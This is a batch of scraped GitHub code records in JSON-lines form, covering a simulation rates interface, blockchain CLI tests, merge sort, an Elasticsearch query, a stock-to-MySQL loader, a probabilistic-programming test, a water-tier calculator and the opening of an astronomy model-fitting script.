{self.file_name}')\n","repo_name":"sandramalaquias/Data-Engineering-Fuel-Price","sub_path":"DAGS/dags/operators/file_to_s3.py","file_name":"file_to_s3.py","file_ext":"py","file_size_in_byte":3804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43911327560","text":"\"\"\" File that contains the Rates interface.\n\"\"\"\n\n# Imports\nimport copy as cp\nimport numpy as np\nfrom abc import ABCMeta, abstractmethod\n\n# Classes\nfrom Classes import lattice as lt\n\n\nclass Rates(metaclass=ABCMeta):\n \"\"\" Abstract class that allows to quickly create rates classes for specific\n systems.\n\n :var self.cell_moves: The number of cells that have a possibility to\n move within the lattice, i.e., the cells whose rates are not zero.\n\n :var self.dimensionality: The dimensionality of the lattice.\n\n :var self.general_rates: List that keeps track of the general rates of\n the system, i.e., the cells whose rates are non-zero.\n\n :var self.lattice: The lattice where the cells are.\n\n :var self.moves_per_cell: The number of moves per cell, that are used to\n determine the rates of each individual cell.\n \"\"\"\n\n # --------------------------------------------------------------------------\n # Getter/Setter/Deleter Methods\n # --------------------------------------------------------------------------\n\n @property\n @abstractmethod\n def cell_moves(self):\n \"\"\" Gets a deep copy of the number of cell moves available.\n\n :returns A deep copy of the number of cell moves available.\n \"\"\"\n\n return cp.deepcopy(self.__cell_moves)\n\n @cell_moves.setter\n @abstractmethod\n def cell_moves(self, cell_moves):\n \"\"\" Sets the number of cells that have a non-zero rate.\n\n :var cell_moves: The new number of cells that have a non-zero rate.\n \"\"\"\n\n # Check that the value is consistent.\n if np.int32(cell_moves) < 0:\n raise ValueError(\"The number of moves must always be positive or zero.\")\n\n self.__cell_moves = cp.deepcopy(np.int32(cell_moves))\n\n @cell_moves.deleter\n @abstractmethod\n def cell_moves(self):\n \"\"\" This attribute should never be deleted.\n \"\"\"\n\n raise AttributeError(\"The cell_moves attribute should never be deleted.\")\n\n # --------------------------------------------------------------------------\n\n @property\n @abstractmethod\n def dimensionality(self):\n \"\"\" Gets a deep copy of the dimensionality of the space that is being used.\n\n :returns A deep copy of the dimensionality of the space that is being used.\n \"\"\"\n\n return cp.deepcopy(self.__dimensionality)\n\n @dimensionality.setter\n @abstractmethod\n def dimensionality(self, _):\n \"\"\" Sets the dimensionality to that of the lattice being used.\n\n :var _: This variable is never used.\n \"\"\"\n\n self.__dimensionality = cp.deepcopy(self.lattice.dimensionality)\n\n @dimensionality.deleter\n @abstractmethod\n def dimensionality(self):\n \"\"\" This attribute should never be deleted.\n \"\"\"\n\n raise AttributeError(\"The dimensionality attribute should never be deleted.\")\n\n # --------------------------------------------------------------------------\n\n @property\n @abstractmethod\n def general_rates(self):\n \"\"\" Gets the general rates of the system.\n\n :returns The general rates of the system.\n \"\"\"\n\n return self.__general_rates\n\n @general_rates.setter\n @abstractmethod\n def general_rates(self, general_rates):\n \"\"\" Sets the general rates of the system.\n\n :var _: This variable is never used.\n \"\"\"\n\n try:\n self.__general_rates\n\n except AttributeError:\n # Create an array where the rates of each cell can be stored.\n rates = np.zeros(self.lattice.lattice_length, dtype=np.double)\n\n # Create an array where the id of each cell is stored.\n ids = np.array([np.int32(-1) for _ in range(self.lattice.lattice_length)], dtype=np.int32)\n\n self.__general_rates = [rates, ids]\n\n @general_rates.deleter\n @abstractmethod\n def general_rates(self):\n \"\"\" This attribute should never be deleted.\n \"\"\"\n\n raise AttributeError(\"The general_rates attribute should never be deleted.\")\n\n # --------------------------------------------------------------------------\n\n @property\n @abstractmethod\n def lattice(self):\n \"\"\" Returns the lattice that is being used.\n\n :returns The lattice that is being used.\n \"\"\"\n\n return self.__lattice\n\n @lattice.setter\n @abstractmethod\n def lattice(self, lattice):\n \"\"\" Sets the lattice to be used.\n\n :lattice: The lattice to be used, can only be done once.\n \"\"\"\n\n try:\n self.__lattice\n\n except AttributeError:\n # Check that the object is a lattice.\n if not type(lattice) == lt.Lattice:\n raise TypeError(\"The assigned object must be a lattice.\")\n\n # Set the lattice.\n self.__lattice = lattice\n\n @lattice.deleter\n @abstractmethod\n def lattice(self):\n \"\"\" This attribute should never be deleted.\n \"\"\"\n\n raise AttributeError(\"The lattice attribute should never be deleted.\")\n\n # --------------------------------------------------------------------------\n\n @property\n @abstractmethod\n def moves_per_cell(self):\n \"\"\" Returns a deep copy of the number of moves per cell.\n\n :returns A deep copy of the number of moves per cell.\n \"\"\"\n\n return cp.deepcopy(self.__moves_per_cell)\n\n @moves_per_cell.setter\n @abstractmethod\n def moves_per_cell(self, moves_per_cell):\n \"\"\" Sets the lattice to be used.\n\n :lattice: The lattice to be used, can only be done once.\n \"\"\"\n\n try:\n self.__moves_per_cell\n\n except AttributeError:\n # Check that the moves per cell are greater than or equal to zero.\n if np.int32(moves_per_cell) < 0:\n raise TypeError(\"The moves per cell must be greater than zero.\")\n\n # Set the moves per cell.\n self.__moves_per_cell = cp.deepcopy(np.int32(moves_per_cell))\n\n @moves_per_cell.deleter\n @abstractmethod\n def moves_per_cell(self):\n \"\"\" This attribute should never be deleted.\n \"\"\"\n\n raise AttributeError(\"The nearest_neighbor_calculator attribute should never be deleted.\")\n\n # --------------------------------------------------------------------------\n # Set Methods\n # --------------------------------------------------------------------------\n\n @abstractmethod\n def set_cell_rates(self, cell_indexes):\n \"\"\" Sets the rates of the given cells.\n\n :var cell_indexes: The indexes of the cells whose rates are to be set.\n \"\"\"\n pass\n\n @abstractmethod\n def set_single_cell_rates(self, cell_index):\n \"\"\" Sets the rates of the given cells.\n\n :var cells: The indexes of the cells whose rates are to be set.\n \"\"\"\n pass\n\n # --------------------------------------------------------------------------\n # Add/Delete Methods\n # --------------------------------------------------------------------------\n\n @abstractmethod\n def _add_cell(self, cell_indentifier):\n \"\"\" Adds an cell to the general rates list, provided the total rate of\n the cell is greater than zero.\n\n :var cell_indentifier: The cell id or index that is to be added to\n the general rates list.\n \"\"\"\n\n # Obtain the desired cell.\n tmp_cell = self.lattice.get_cell(cell_indentifier)\n\n # Do not bother with cells that are already in the list or their rate is zero.\n if not tmp_cell.special_id < 0 or not tmp_cell.get_total_rate() > np.double(0.0):\n return\n\n # Add the cell at the end of the array and set the special id.\n self.general_rates[1][self.cell_moves] = cp.deepcopy(self.lattice.get_id(cell_indentifier))\n tmp_cell.special_id = cp.deepcopy(self.cell_moves)\n\n # Remember to add one to the counter.\n self.cell_moves += 1\n\n if self.cell_moves > self.lattice.lattice_length:\n raise ValueError(\"The cell_moves counter must never exceed the lattice length.\")\n\n @abstractmethod\n def _delete_cell(self, cell_indentifier):\n \"\"\" Deletes a cell from the general rates list, provided it is in the\n list.\n\n :var cell_cell_indentifier: The cell that is to be deleted from the general\n rates list.\n \"\"\"\n\n # Obtain the desired cell.\n tmp_cell = self.lattice.get_cell(cell_indentifier)\n\n # Do not bother with cells that are not in the list or an empty list.\n if tmp_cell.special_id < 0 or self.cell_moves == 0:\n return\n\n # Remove the cell from the list.\n special_id_tmp = cp.deepcopy(tmp_cell.special_id)\n\n # Swap the special_id to the correct one.\n self.general_rates[1][special_id_tmp] = cp.deepcopy(self.general_rates[1][self.cell_moves - 1])\n self.lattice.get_cell(self.general_rates[1][special_id_tmp]).special_id = cp.deepcopy(special_id_tmp)\n self.general_rates[1][self.cell_moves - 1] = np.int32(-1)\n\n # Set the special id of the last one to zero.\n tmp_cell.special_id = np.int32(-1)\n\n # Remember to subtract one to the counter.\n self.cell_moves -= 1\n\n if self.cell_moves < 0:\n raise ValueError(\"The cell_moves counter must never be below zero.\")\n\n # --------------------------------------------------------------------------\n # Initialization Methods\n # --------------------------------------------------------------------------\n\n @abstractmethod\n def _initialize_rates(self):\n \"\"\" Initializes the general rates list/array and the individual rates\n of each cell of the lattice.\n \"\"\"\n\n # Set the rates of each cell to zero.\n for i in range(self.lattice.lattice_length):\n rate_list = np.zeros(self.moves_per_cell, dtype=np.double)\n self.lattice.cell_lattice[i].rates = rate_list\n\n @abstractmethod\n def _initialize_system(self):\n \"\"\" Initializes the general rates list/array and the individual rates of\n each cell of the lattice.\n \"\"\"\n\n # Initialize the rates of the system.\n self._initialize_rates()\n\n # --------------------------------------------------------------------------\n # Retrieve Methods\n # --------------------------------------------------------------------------\n\n @abstractmethod\n def _retrieve_indexes_in_lattice(self, indexes):\n \"\"\" Retrieves the cell indexes that are in the lattice from a set of\n indexes.\n\n :var indexes: A vector index that represents a cell within the\n lattice.\n\n :returns A vector that contains the resulting indexes WITHIN the\n lattice.\n \"\"\"\n\n # Set the list.\n indexes_in_lattice = []\n\n # Evaluate the indexes.\n for i, index0 in enumerate(indexes):\n # Add the index if it is valid.\n if self.lattice.get_valid_index(index0):\n\n # Only use non-repeated indexes.\n in_vector = False\n for index1 in indexes_in_lattice:\n in_vector = in_vector or np.array_equal(index0, index1)\n if in_vector:\n break\n\n # Only add non-repeated indexes.\n if not in_vector:\n indexes_in_lattice.append(cp.deepcopy(index0))\n\n return indexes_in_lattice\n\n # --------------------------------------------------------------------------\n # Update Rates Methods\n # --------------------------------------------------------------------------\n\n @abstractmethod\n def update_rates(self, cell_indexes):\n \"\"\" Updates the rates and general rates of the given cell indexes, after\n filtering them.\n\n :var cell_indexes: The indexes of the cells that are to be updated.\n \"\"\"\n\n # Retrieve the indexes that are in the lattice.\n list_indexes = self._retrieve_indexes_in_lattice(cell_indexes)\n\n # Update the rates.\n self.set_cell_rates(list_indexes)\n\n # Update the cells in the general rates array.\n for index in list_indexes:\n self._delete_cell(index)\n self._add_cell(index)\n\n # --------------------------------------------------------------------------\n # Validation Methods\n # --------------------------------------------------------------------------\n\n @abstractmethod\n def _validates_correct_list(self, list_to_validate):\n \"\"\" Validates if the list_to_validate is a list that contains numpy\n arrays of integer numbers with the correct dimensionality and\n integer indexes.\n\n var: list_to_validate: The list that needs validation.\n \"\"\"\n\n # Validate the list has non-zero length.\n if not isinstance(list_to_validate, list) or len(list_to_validate) < 1:\n raise ValueError(\"The list_to_validate must be a list and contain at least one value.\")\n\n # Validate each element of the list_to_validate is the correct\n # dimensionality and the types are np.int32 elements.\n for elem in list_to_validate:\n validate = len(elem) == self.dimensionality\n validate = validate and isinstance(elem, (type(np.array([]))))\n validate = validate and all(list(map(lambda x: isinstance(x, np.int32), elem)))\n\n if not validate:\n str0 = \"The elements of the list_to_validate must be numpy \"\n str0 += \"arrays of length 3, with integers.\"\n raise ValueError(str0)\n","repo_name":"AndresGarciaEscovar/Python-KMC","sub_path":"Code/Classes/Interfaces/ratesinterface.py","file_name":"ratesinterface.py","file_ext":"py","file_size_in_byte":13760,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"71400796354","text":"import os\nimport subprocess\nimport time\nimport types\n\nimport brownie\nfrom enforce_typing import enforce_types\n\nfrom util import csvs, networkutil, oceanutil, oceantestutil\nfrom util.base18 import fromBase18, toBase18\nfrom util.constants import BROWNIE_PROJECT as B\n\naccounts, PREV, DISPENSE_ACCT = None, None, None\n\nCHAINID = networkutil.DEV_CHAINID\nADDRESS_FILE = networkutil.chainIdToAddressFile(networkutil.DEV_CHAINID)\nST = 0\n\n\n@enforce_types\ndef test_query(tmp_path):\n CSV_DIR = str(tmp_path)\n\n # insert fake inputs: info onto the chain\n oceantestutil.fillAccountsWithOCEAN()\n time.sleep(2)\n\n # insert fake inputs: rate csv file\n csvs.saveRateCsv(\"OCEAN\", 0.5, CSV_DIR)\n\n # main cmd\n FIN = \"latest\"\n NSAMP = 5\n\n cmd = f\"./dftool query {ST} {FIN} {NSAMP} {CSV_DIR} {CHAINID}\"\n os.system(cmd)\n\n # test result\n assert csvs.nftvolsCsvFilenames(CSV_DIR)\n assert csvs.symbolsCsvFilenames(CSV_DIR)\n\n\n@enforce_types\ndef test_getrate(tmp_path):\n # insert fake inputs:\n # \n\n # main cmd\n TOKEN_SYMBOL = \"OCEAN\"\n _ST = \"2022-01-01\"\n FIN = \"2022-02-02\"\n CSV_DIR = str(tmp_path)\n\n cmd = f\"./dftool getrate {TOKEN_SYMBOL} {_ST} {FIN} {CSV_DIR}\"\n os.system(cmd)\n\n # test result\n assert csvs.rateCsvFilenames(CSV_DIR)\n\n\n@enforce_types\ndef test_vebals(tmp_path):\n CSV_DIR = str(tmp_path)\n FIN = \"latest\"\n NSAMP = 100\n\n cmd = f\"./dftool vebals {ST} {FIN} {NSAMP} {CSV_DIR} {CHAINID}\"\n os.system(cmd)\n\n # test result\n vebals_csv = csvs.vebalsCsvFilename(CSV_DIR)\n assert os.path.exists(vebals_csv), \"vebals csv file not found\"\n\n # test without sampling\n cmd = f\"./dftool vebals {ST} {FIN} 1 {CSV_DIR} {CHAINID}\" # NSAMP=1\n os.system(cmd)\n\n # test result\n vebals_csv = csvs.vebalsCsvFilename(CSV_DIR, False)\n assert os.path.exists(vebals_csv), \"vebals_realtime csv not found\"\n\n\n@enforce_types\ndef test_allocations(tmp_path):\n CSV_DIR = str(tmp_path)\n FIN = \"latest\"\n NSAMP = 100\n\n cmd = f\"./dftool allocations {ST} {FIN} {NSAMP} {CSV_DIR} {CHAINID}\"\n os.system(cmd)\n\n # test result\n allocations_csv = csvs.allocationCsvFilename(CSV_DIR)\n assert os.path.exists(allocations_csv), \"allocations csv file not found\"\n\n # test without sampling\n cmd = f\"./dftool allocations {ST} {FIN} 1 {CSV_DIR} {CHAINID}\" # NSAMP=1\n os.system(cmd)\n\n # test result\n allocations_csv = csvs.allocationCsvFilename(CSV_DIR, False)\n assert os.path.exists(allocations_csv), \"allocations_realtime csv not found\"\n\n\n@enforce_types\ndef test_calc(tmp_path):\n CSV_DIR = str(tmp_path)\n OCEAN_addr = oceanutil.OCEAN_address()\n\n # insert fake csvs\n allocations = {CHAINID: {\"0xpool_addra\": {\"0xlp_addr1\": 1.0}}}\n csvs.saveAllocationCsv(allocations, CSV_DIR)\n\n nftvolts_at_chain = {OCEAN_addr: {\"0xpool_addra\": 1.0}}\n csvs.saveNftvolsCsv(nftvolts_at_chain, CSV_DIR, CHAINID)\n\n vebals = {\"0xlp_addr1\": 1.0}\n locked_amt = {\"0xlp_addr1\": 10.0}\n unlock_time = {\"0xlp_addr1\": 1}\n csvs.saveVebalsCsv(vebals, locked_amt, unlock_time, CSV_DIR)\n\n symbols_at_chain = {OCEAN_addr: \"OCEAN\"}\n csvs.saveSymbolsCsv(symbols_at_chain, CSV_DIR, CHAINID)\n\n csvs.saveRateCsv(\"OCEAN\", 0.50, CSV_DIR)\n\n # main cmd\n TOT_OCEAN = 1000.0\n cmd = f\"./dftool calc {CSV_DIR} {TOT_OCEAN}\"\n os.system(cmd)\n\n # test result\n rewards_csv = csvs.rewardsperlpCsvFilename(CSV_DIR, \"OCEAN\")\n assert os.path.exists(rewards_csv)\n\n\n@enforce_types\ndef test_dispense(tmp_path):\n # values used for inputs or main cmd\n global accounts\n accounts = brownie.network.accounts\n account1 = accounts[1]\n address1 = account1.address.lower()\n CSV_DIR = str(tmp_path)\n TOT_OCEAN = 1000.0\n\n # accounts[0] has OCEAN. Ensure that dispensing account has some\n global DISPENSE_ACCT\n OCEAN = oceanutil.OCEANtoken()\n OCEAN.transfer(DISPENSE_ACCT, toBase18(TOT_OCEAN), {\"from\": accounts[0]})\n assert fromBase18(OCEAN.balanceOf(DISPENSE_ACCT.address)) == TOT_OCEAN\n\n # insert fake inputs: rewards csv, new dfrewards.sol contract\n rewards = {CHAINID: {address1: TOT_OCEAN}}\n csvs.saveRewardsperlpCsv(rewards, CSV_DIR, \"OCEAN\")\n\n df_rewards = B.DFRewards.deploy({\"from\": accounts[0]})\n\n # main command\n CSV_DIR = str(tmp_path)\n DFREWARDS_ADDR = df_rewards.address\n TOKEN_ADDR = oceanutil.OCEAN_address()\n\n cmd = f\"./dftool dispense {CSV_DIR} {CHAINID} {DFREWARDS_ADDR} {TOKEN_ADDR}\"\n os.system(cmd)\n\n # test result\n assert df_rewards.claimable(address1, OCEAN.address)\n\n\n@enforce_types\ndef test_manyrandom():\n cmd = f\"./dftool manyrandom {networkutil.DEV_CHAINID}\"\n output_s = \"\"\n with subprocess.Popen(\n cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT\n ) as proc:\n while proc.poll() is None:\n output_s += proc.stdout.readline().decode(\"ascii\")\n return_code = proc.wait()\n assert return_code == 0, f\"Error. \\n{output_s}\"\n\n\n@enforce_types\ndef test_noarg_commands():\n # Test commands that have no args. They're usually help commands;\n # sometimes they do the main work (eg compile).\n argv1s = [\n \"\",\n \"query\",\n \"getrate\",\n \"calc\",\n \"dispense\",\n \"querymany\",\n \"compile\",\n \"manyrandom\",\n \"newdfrewards\",\n \"mine\",\n \"newacct\",\n \"newtoken\",\n \"acctinfo\",\n \"chaininfo\",\n ]\n for argv1 in argv1s:\n print(f\"Test dftool {argv1}\")\n cmd = f\"./dftool {argv1}\"\n\n output_s = \"\"\n with subprocess.Popen(\n cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT\n ) as proc:\n while proc.poll() is None:\n output_s += proc.stdout.readline().decode(\"ascii\")\n\n return_code = proc.wait()\n assert return_code == 0, f\"'dftool {argv1}' failed. \\n{output_s}\"\n\n\n@enforce_types\ndef test_checkpoint_feedistributor():\n feeDistributor = oceanutil.FeeDistributor()\n timecursor_before = feeDistributor.time_cursor()\n brownie.network.chain.sleep(60 * 60 * 24 * 7)\n brownie.network.chain.mine()\n cmd = f\"./dftool checkpoint_feedist {CHAINID}\"\n os.system(cmd)\n\n timecursor_after = feeDistributor.time_cursor()\n\n assert timecursor_after > timecursor_before\n\n\n@enforce_types\ndef setup_function():\n global accounts, PREV, DISPENSE_ACCT, ST\n\n networkutil.connect(CHAINID)\n ST = len(brownie.network.chain)\n accounts = brownie.network.accounts\n oceanutil.recordDevDeployedContracts()\n oceantestutil.fillAccountsWithOCEAN()\n\n PREV = types.SimpleNamespace()\n\n PREV.DFTOOL_KEY = os.environ.get(\"DFTOOL_KEY\")\n DISPENSE_ACCT = brownie.network.accounts.add()\n os.environ[\"DFTOOL_KEY\"] = DISPENSE_ACCT.private_key\n\n PREV.ADDRESS_FILE = os.environ.get(\"ADDRESS_FILE\")\n os.environ[\"ADDRESS_FILE\"] = networkutil.chainIdToAddressFile(CHAINID)\n\n PREV.SUBGRAPH_URI = os.environ.get(\"SUBGRAPH_URI\")\n os.environ[\"SUBGRAPH_URI\"] = networkutil.chainIdToSubgraphUri(CHAINID)\n\n os.environ[\"SECRET_SEED\"] = \"1234\"\n\n OCEAN = oceanutil.OCEANtoken()\n tups = oceantestutil.randomCreateDataNFTWithFREs(8, OCEAN, accounts)\n oceantestutil.randomConsumeFREs(tups, OCEAN)\n oceantestutil.randomLockAndAllocate(tups)\n\n brownie.network.chain.mine(20)\n brownie.network.chain.sleep(20)\n brownie.network.chain.mine(20)\n time.sleep(2)\n\n\n@enforce_types\ndef teardown_function():\n networkutil.disconnect()\n\n global PREV\n\n if PREV.DFTOOL_KEY is None:\n del os.environ[\"DFTOOL_KEY\"]\n else:\n os.environ[\"DFTOOL_KEY\"] = PREV.DFTOOL_KEY\n\n if PREV.ADDRESS_FILE is None:\n del os.environ[\"ADDRESS_FILE\"]\n else:\n os.environ[\"ADDRESS_FILE\"] = PREV.ADDRESS_FILE\n\n if PREV.SUBGRAPH_URI is None:\n del os.environ[\"SUBGRAPH_URI\"]\n else:\n os.environ[\"SUBGRAPH_URI\"] = PREV.SUBGRAPH_URI\n","repo_name":"trangnv/df-strat","sub_path":"util/test/test_dftool.py","file_name":"test_dftool.py","file_ext":"py","file_size_in_byte":7906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10071415458","text":"import random\n\n\ndef mergeSort(elems):\n mergeHelper(elems, 0, len(elems) - 1)\n\n\ndef mergeHelper(elems, start, end):\n if start >= end:\n return\n\n mid = (start + end) // 2\n mergeHelper(elems, start, mid)\n mergeHelper(elems, mid + 1, end)\n merge(elems, start, mid, end)\n\n\ndef merge(elems, start, mid, end):\n aux = []\n l, r = start, mid + 1\n while l <= mid and r <= end:\n if elems[l] <= elems[r]:\n aux.append(elems[l])\n l += 1\n else:\n aux.append(elems[r])\n r += 1\n while l <= mid:\n aux.append(elems[l])\n l += 1\n\n while r <= end:\n aux.append(elems[r])\n r += 1\n\n for x in range(len(aux)):\n elems[x+start] = aux[x]\n\n\n# test = [random.randint(0, 9) for x in range(10)]\n# print(test)\n# mergeSort(test)\n# print(test)\n\n\ndef mergeOneParam(elems):\n if len(elems) > 1:\n # mid\n mid = len(elems) // 2\n\n # copy left\n l = elems[:mid]\n\n # copy right\n r = elems[mid:]\n\n mergeOneParam(l)\n mergeOneParam(r)\n\n li = ri = ei = 0\n\n while li < len(l) and ri < len(r):\n if l[li] <= r[ri]:\n elems[ei] = l[li]\n li += 1\n else:\n elems[ei] = r[ri]\n ri += 1\n ei += 1\n\n while li < len(l):\n elems[ei] = l[li]\n li += 1\n ei += 1\n\n while ri < len(r):\n elems[ei] = r[ri]\n ri += 1\n ei += 1\n\n\n# test = [random.randint(0, 9) for x in range(10)]\n# print(test)\n# mergeOneParam(test)\n# print(test)\n\n\ndef mergeBottomUp(A):\n subsize = 1\n while subsize < len(A):\n x = 0\n while x < len(A):\n print('in merge portion')\n print(x)\n start = x\n mid = x+subsize - 1\n\n if mid >= len(A) - 1:\n print('mid is past or at end of array')\n break\n end = start + 2 * subsize - 1\n if end >= len(A):\n end = len(A) - 1\n merge(A, start, mid, end)\n x = end + 1\n subsize *= 2\n\n\nprint('merge bottom up')\n\ntest = [random.randint(0, 9) for x in range(10)]\nprint(test)\nmergeBottomUp(test)\nprint(test)\n","repo_name":"xavierpjb/AlgoDataStruct","sub_path":"python/IkAlgs/sorting/merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":2275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2238770167","text":"from elasticsearch import Elasticsearch\n\ntry:\n es = Elasticsearch([{\"host\":\"localhost\",\"port\":9200}])\n print(es)\n try:\n print(es.search(index=\"elasticsearch\", body={\"_source\": [\"username\", \"starttime\"], \"query\": {\"range\": {\"starttime\": {\"gt\":\"2019-10-24T08:30:00.000Z\"}}}}))\n except:\n print(\"Data not Found\")\nexcept:\n print(\"Connection not Established\")","repo_name":"Dewanshurahul/BridgeLabz_Mumbai","sub_path":"ElasticSearch/ElasticSearch_Task/late_commers.py","file_name":"late_commers.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34753262910","text":"#coding:gbk\nimport json\nimport pymysql\nconn = pymysql.connect(\n host = 'localhost',#mysql服务器地址\n port = 3306,#端口号\n user = 'root',#用户名\n passwd = '19980729',#密码\n db = 'users',#数据库名称\n charset = 'utf8',#连接编码,根据需要填写\n )\ncur = conn.cursor()#创建并返回游标\nsql = \"CREATE TABLE stocktestforus (mingcheng VARCHAR(100),zuixinjia VARCHAR(100),zhangdiefu VARCHAR(100),zhangdiee VARCHAR(100),zuigao VARCHAR(100),zuidi VARCHAR(100) ,jinkai VARCHAR(100),zuoshou VARCHAR(100),zongshizhi VARCHAR(100),shiyinglv VARCHAR(100));\"\ncur.execute(sql)\ntemp =[]\nx=0 \nwith open('us.json','r') as file:\n str = file.read()\n data = json.loads(str)\nfor num in range(len(data)):\n stock = data[num]\n for key in stock:\n if stock[key]=='-':\n temp.append(stock['序号'])\n break\nfor num in temp:\n for i in range(len(data)-10):\n if(data[i]['序号'])==num:\n x=x+1\n del data[i]\nfor da in data:\n\tmingcheng=da['名称']\n\tzuixinjia=da['最新价(美元)']\n\tzhangdiefu=da['涨跌幅']\n\tzhangdiee=da['涨跌额']\n\tzuigao=da['最高']\n\tzuidi=da['最低']\n\tjinkai=da['开盘价']\n\tzuoshou=da['昨收']\n\tzongshizhi = da['总市值(美元)']\n\tshiyinglv = da['市盈率']\n\tsql_insert =(\"insert into stocktestforus (mingcheng,zuixinjia,zhangdiefu,zhangdiee,zuigao,zuidi,jinkai,zuoshou,zongshizhi,shiyinglv) values (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s);\")\n\tcur.execute(sql_insert,(mingcheng,zuixinjia,zhangdiefu,zhangdiee,zuigao,zuidi,jinkai,zuoshou,zongshizhi,shiyinglv))\nconn.commit()\nconn.close()\n\n\t\n\t\n","repo_name":"yxyzds/NEU-STOCK","sub_path":"数据库连接脚本/tomysqlforus.py","file_name":"tomysqlforus.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16932628855","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport edward as ed\nimport tensorflow as tf\n\nfrom edward.models import Normal\n\n\nclass test_random_variable_session_class(tf.test.TestCase):\n\n def test_eval(self):\n with self.test_session() as sess:\n x = Normal(0.0, 0.1)\n x_ph = tf.placeholder(tf.float32, [])\n y = Normal(x_ph, 0.1)\n self.assertLess(x.eval(), 5.0)\n self.assertLess(x.eval(sess), 5.0)\n self.assertLess(x.eval(feed_dict={x_ph: 100.0}), 5.0)\n self.assertGreater(y.eval(feed_dict={x_ph: 100.0}), 5.0)\n self.assertGreater(y.eval(sess, feed_dict={x_ph: 100.0}), 5.0)\n self.assertRaises(tf.errors.InvalidArgumentError, y.eval)\n self.assertRaises(tf.errors.InvalidArgumentError, y.eval, sess)\n\n def test_run(self):\n with self.test_session() as sess:\n x = Normal(0.0, 0.1)\n x_ph = tf.placeholder(tf.float32, [])\n y = Normal(x_ph, 0.1)\n self.assertLess(sess.run(x), 5.0)\n self.assertLess(sess.run(x, feed_dict={x_ph: 100.0}), 5.0)\n self.assertGreater(sess.run(y, feed_dict={x_ph: 100.0}), 5.0)\n self.assertRaises(tf.errors.InvalidArgumentError, sess.run, y)\n\nif __name__ == '__main__':\n ed.set_seed(82341)\n tf.test.main()\n","repo_name":"blei-lab/edward","sub_path":"tests/models/random_variable_session_test.py","file_name":"random_variable_session_test.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","stars":4805,"dataset":"github-code","pt":"61"} +{"seq_id":"20786252919","text":"import os\nimport math\n\n\n#TO do this for the user with THEIR county/state\n#GET the county lot size ranges, put them in a list\n#GET the county TIER rate ranges\n#THEN use the logic down below with the COUNTY lot/tier ranges\n\n#Determine lot size tier\ndef determine_lot_size(lot_size):\n\n tier1 = \"Lot Size Tier 1\"\n tier2 = \"Lot Size Tier 2\" \n tier3 = \"Lot Size Tier 3\"\n tier4 = \"Lot Size Tier 4\" \n tier5 = \"Lot Size Tier 5\"\n\n if lot_size < 7500: \n print(lot_size)\n return tier1\n elif lot_size in range(7500, 10999):\n print(lot_size)\n return tier2\n elif lot_size in range(11000, 17499): \n print(lot_size)\n return tier3\n elif lot_size in range(17500, 43559): \n print(lot_size) \n return tier4\n elif lot_size > 43560: \n print(lot_size)\n return tier5\n else: \n print(\"waiting for other shit\")\n\n\ndef determine_tier_lot(HCF, tier2_range, tier3_range, tier4_range):\n if HCF == 8:\n print(\"Tier 1 water usage\")\n elif HCF in tier2_range:\n print(\"Tier 2 water Usage\")\n elif HCF in tier3_range:\n print(\"Tier 3 water Usage\")\n elif HCF in tier4_range: \n print(\"Tier 4 Water usuage\")\n else:\n print(\"Need HCF\")\n\n print(lot_tier)\n\n\ndef determine_HCF(lot_tier, HCF):\n\n #Default tier ranges\n tier2_range = range(9, 17)\n tier3_range = range(15, 35)\n tier4_range = range(26, 44)\n\n if lot_tier == \"Lot Size Tier 1\":\n determine_tier_lot(HCF, )\n\n elif lot_tier == \"Lot Size Tier 2\":\n tier2_range = range(9, 20)\n tier3_range = range(18, 44)\n tier4_range = range(35, 44)\n determine_tier_lot(HCF, tier2_range, tier3_range, tier4_range) \n\n elif lot_tier == \"Lot Size Tier 3\":\n tier2_range = range(9, 33)\n tier3_range = range(26, 83)\n tier4_range = range(59, 83)\n determine_tier_lot(HCF, tier2_range, tier3_range, tier4_range)\n\n elif lot_tier == \"Lot Size Tier 4\":\n tier2_range = range(9, 39)\n tier3_range = range(30, 101)\n tier4_range = range(71, 101)\n determine_tier_lot(HCF, tier2_range, tier3_range, tier4_range)\n\n elif lot_tier == \"Lot Size Tier 5\":\n tier2_range = range(9, 39)\n tier3_range = range(30, 101)\n tier4_range = range(71, 101)\n determine_tier_lot(HCF, tier2_range, tier3_range, tier4_range)\n else:\n print(\"NO Lot tier inputted\")\n\nlot_size = input(\"Enter lot size:\")\nmy_HCF = input(\"Enter HCF:\") \nlot_size = int(lot_size) \nmy_HCF = int(my_HCF) \nlot_tier = determine_lot_size(lot_size) \ndetermine_HCF(lot_tier, my_HCF)\n\n\n\n\n\n","repo_name":"shaysingh818/Saya-Life","sub_path":"api_wrapper/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":2621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36476000715","text":"# Fitting Phoebe with emcee\n# A. Phriksee\n# Ver. 1.0, 14/05/2020\n \nimport os\nos.environ[\"OMP_NUM_THREADS\"] = \"1\"\n\n# Import Extension\nimport sys\nimport numpy as np\nimport emcee\nimport time\nfrom schwimmbad import MPIPool\nimport corner\n\n# Try to force the PHOEBE to run with single core in each value\ntemp_environ = dict(os.environ)\ndel os.environ['PMI_SIZE']\nimport phoebe\nos.environ.clear()\nos.environ.update(temp_environ)\n\n# Input data\ndata = np.loadtxt(\"mock_data.dat\")\nJD = data[:, 0]\nflux = data[:, 1]\nerr_flux = data[:, 2]\nsigma2 = err_flux**2.0\n\n# Setting BC\npos_lim_min = np.array([0.30, 